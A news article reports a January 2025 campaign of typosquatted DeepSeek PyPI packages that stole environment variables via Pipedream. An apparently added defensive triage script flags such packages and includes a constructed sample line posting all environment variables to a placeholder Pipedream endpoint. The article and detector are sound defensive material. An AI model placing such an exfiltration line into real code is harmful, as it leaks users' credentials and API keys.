Cyber Security News

Beware of Fake DeepSeek PyPI Packages That Deliver Malware

The Positive Technologies Expert Security Center (PT ESC) recently uncovered a malicious campaign targeting the Python Package Index (PyPI) repository.

The campaign involved two packages, named deepseeek and deepseekai, designed to collect sensitive user data and environment variables.

These packages exploited the growing interest in AI and machine learning tools, particularly targeting developers and AI enthusiasts.

The attack, orchestrated by a user under the alias “bvk,” began on January 29, 2025.

The account had been dormant since its creation in June 2023, raising red flags about its origin.

The malicious payload embedded in the packages activates when users execute commands associated with the respective packages.

[Figure: DeepSeek PyPI packages. Caption: Malicious payload used in the packages]

Once triggered, the payload collects sensitive data such as API keys, credentials, and access tokens stored in environment variables.

These variables play a critical role in enabling application functionalities and accessing infrastructure resources.

Both packages utilized Pipedream, a developer integration platform, as their command-and-control (C2) server to transmit stolen data.

Analyzing the script revealed it was partially generated with the assistance of AI, evident from characteristic in-code comments.

The Attack Chain

The deepseeek package was first uploaded at 15:52 UTC on January 29, followed shortly by deepseekai at 16:13 UTC.

Within 30 minutes, PT ESC researchers flagged the packages as malicious and informed PyPI administrators, who swiftly quarantined them.

By 16:41 UTC, the deepseeek package was removed, followed by the deletion of deepseekai shortly after.

Despite the prompt response, the packages were downloaded multiple times before removal.

PyPI’s logs reveal 222 downloads across various countries, including the U.S., China, Russia, and Germany.

The downloads occurred via various methods, including pip, bandersnatch, and manual browser access.

The United States accounted for the majority of downloads, followed by China and Russia.

While the campaign was not particularly sophisticated, it serves as a cautionary tale about how cybercriminals exploit trending technologies to deceive unsuspecting users.

As AI tools like DeepSeek gain popularity, attackers will continue leveraging such opportunities.

Fortunately, PT ESC’s PT PyAnalysis tool, designed to monitor PyPI for suspicious activity in real time, played a pivotal role in uncovering these packages before significant harm could occur.

Developers and security teams are advised to exercise heightened caution when integrating newly released PyPI packages into their workflows.

Verify the credibility of package maintainers and utilize automated tools to flag suspicious activity.
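The two behaviours the article attributes to the payload (reading environment variables and shipping them to a Pipedream endpoint), plus the typosquatted name, are simple enough to screen for automatically. The following is an added example, not PT ESC's PyAnalysis tool or any code from the campaign; the watch-list, the similarity threshold, and the sample source string are constructed assumptions for illustration.

```python
"""Static triage of a PyPI package for the indicators described in the article:
a name close to a trending project, os.environ harvesting, and outbound traffic
to a Pipedream endpoint. Heuristics are hypothetical, not a vendor's rules."""
import ast
import difflib

WATCHED_NAMES = {"deepseek"}            # constructed watch-list of trending names
SUSPECT_DOMAINS = ("pipedream.net",)    # developer platform the article names as C2


def looks_like_typosquat(name: str) -> bool:
    """True if name is close to, but not identical to, a watched project name."""
    name = name.lower()
    return any(
        name != w and difflib.SequenceMatcher(None, name, w).ratio() >= 0.8
        for w in WATCHED_NAMES
    )


class _Visitor(ast.NodeVisitor):
    """Walk a module's AST collecting the two behavioural indicators."""
    def __init__(self):
        self.reads_environ = False
        self.suspect_urls = []

    def visit_Attribute(self, node):
        if node.attr == "environ":       # os.environ, os.environ.items(), dict(os.environ)
            self.reads_environ = True
        self.generic_visit(node)

    def visit_Constant(self, node):
        if isinstance(node.value, str) and any(d in node.value for d in SUSPECT_DOMAINS):
            self.suspect_urls.append(node.value)
        self.generic_visit(node)


def triage(package_name: str, source: str) -> list[str]:
    """Return findings for one package's source; an empty list means nothing flagged."""
    findings = []
    if looks_like_typosquat(package_name):
        findings.append(f"name '{package_name}' resembles a watched project")
    v = _Visitor()
    v.visit(ast.parse(source))
    if v.reads_environ:
        findings.append("reads os.environ (credential/API-key harvesting pattern)")
    findings += [f"contacts developer-platform endpoint: {u}" for u in v.suspect_urls]
    if v.reads_environ and v.suspect_urls:
        findings.append("HIGH: environment read combined with outbound call to Pipedream")
    return findings


# Constructed sample mimicking the behaviour the article describes (placeholder host).
SAMPLE = "import os, requests\nrequests.post('https://PLACEHOLDER.m.pipedream.net', json=dict(os.environ))\n"

if __name__ == "__main__":
    print("\n".join(triage("deepseeek", SAMPLE)))
```

Run it over the extracted sdist or wheel contents of a newly published package before installing; the combination flagged as HIGH is the one both packages in this campaign exhibited.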

As the cybersecurity landscape continues to evolve, vigilance remains the best defense against supply chain threats.


Aman Mishra

Aman Mishra is a security and privacy reporter covering data breaches, cybercrime, malware, and vulnerabilities.
